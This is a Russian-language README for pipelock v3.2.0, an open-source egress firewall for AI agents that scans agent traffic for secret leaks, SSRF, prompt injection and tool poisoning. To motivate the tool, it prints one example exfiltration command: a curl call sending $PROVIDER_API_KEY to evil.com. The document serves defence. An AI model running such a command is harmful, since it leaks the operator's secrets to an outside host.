
pipelock v3.2.0
Открытый межсетевой экран для AI-агентов, который сканирует HTTP, MCP, A2A и WebSocket трафик на предмет эксфильтрации, SSRF и внедрения промптов, генерируя верифицируемые подписанные квитанции действий для аудита.
Открытый межсетевой экран для ИИ-агентов с поддержкой проверяемого контроля исходящего трафика.
Pipelock располагается между ИИ-агентами и сетью. Он проверяет опосредованный трафик HTTP, WebSocket, MCP и A2A, а также содержимое туннелей CONNECT при включённой перехвате TLS, на предмет утечки секретов, внедрения промптов, SSRF, отравления инструментов и рискованных цепочек вызовов инструментов. Обычный CONNECT без перехвата сканируется на уровне имени хоста и URL. Настроенные вышестоящие серверы MCP являются исключением из блокировки SSRF для частных адресов: локальные/частные серверы разрешены, но конечные точки облачных метаданных остаются заблокированными.
Pipelock выпускает подписанные посредником квитанции действий о решениях на границах с учётом содержимого, чтобы проверяющий мог убедиться в том, что решил Pipelock, вне среды выполнения агента. Публичный корпус agent-egress-bench проверяет обнаружения. Рабочий процесс Gauntlet — это запланированный экзамен-кандидат продукта против закреплённого коммита корпуса; он не публикует автоматически публичную оценку. Узнать больше: Открытый ИИ-межсетевой экран.
Работает с: Claude Code · OpenAI Codex · Cline · OpenCode · Pi · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph
Проблема · Проверка · Быстрый старт · В действии · Что перехватывает · Возможности · Архитектура · Документация · Песочница · Блог · Спросить Dosu
Попробуйте в браузере в живой песочнице. Если Pipelock это заслужил, поставьте звезду репозиторию, чтобы другие люди его нашли.
Проблема
У вашего ИИ-агента есть $PROVIDER_API_KEY в его окружении, а также доступ к оболочке. Один запрос может его слить:```bash
curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching
Каждое машинное действие, которое совершает ваш агент, должно пересекать границу между вашими секретами и открытым интернетом. Pipelock становится этой границей, когда агент маршрутизируется через его прокси, обёртку MCP, песочницу, модель изоляции хоста или топологию развёртывания кластера. Он сканирует опосредованный исходящий и входящий трафик, блокирует или помечает атаки в зависимости от режима и записывает подписанные доказательства решения.
---
## Проверьте это сами
Большинство инструментов безопасности агентов просят вас доверять их панели управления. Pipelock выдаёт вам подписанную квитанцию и позволяет проверить её самостоятельно, офлайн, с помощью ключа, который хранится у вас. Без аккаунта и без сервера.